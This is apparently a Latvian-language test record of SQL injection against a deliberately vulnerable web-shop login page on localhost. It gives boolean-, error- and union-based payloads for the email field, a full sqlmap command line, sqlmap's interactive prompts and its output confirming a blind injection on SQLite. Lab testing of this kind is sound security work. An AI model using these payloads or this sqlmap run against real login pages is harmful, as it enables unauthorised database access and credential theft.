=================================================================================
1. Īpašība: pseidorealistiska interveikla login lappuse
2. Nepiciešams tampering: nē
3. Sagaidāmais rezultāts: 
3.1. boolean-based: email=test' or 1=1-- -&password=test
3.2. error-based: email=test'&password=test
3.3. time-based: -
3.4. union: email=test' UNION SELECT 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13-- -&password=test
4. Reālais rezultāts: redzams zemāk
5. Vidējais risinājuma ilgums: 1106640 nanosekundes
6. Palaistā komanda
sqlmap -u "http://localhost:3000/rest/user/login" --data="email=test&password=test" --risk=3 --level=5 --ignore-code 401

7. Jautājumi, kurus uzdeva SQLMap:
7.1. it looks like the back-end DBMS is 'SQLite'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
7.2. injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
7.3. injection not exploitable with NULL values. Do you want to try with a random integer value for option '--union-char'? [Y/n] y
7.4. POST parameter 'email' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
7.5. it is recommended to perform only basic UNION tests if there is not at least one other (potential technique found. Do you want to reduce the number of requests? [Y/n] y
=================================================================================
sqlmap identified the following injection point(s) with a total of 5683 HTTP(s) requests:
---
Parameter: email (POST)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: email=-4635' OR 4166=4166-- jDde&password=test
---
back-end DBMS: SQLite
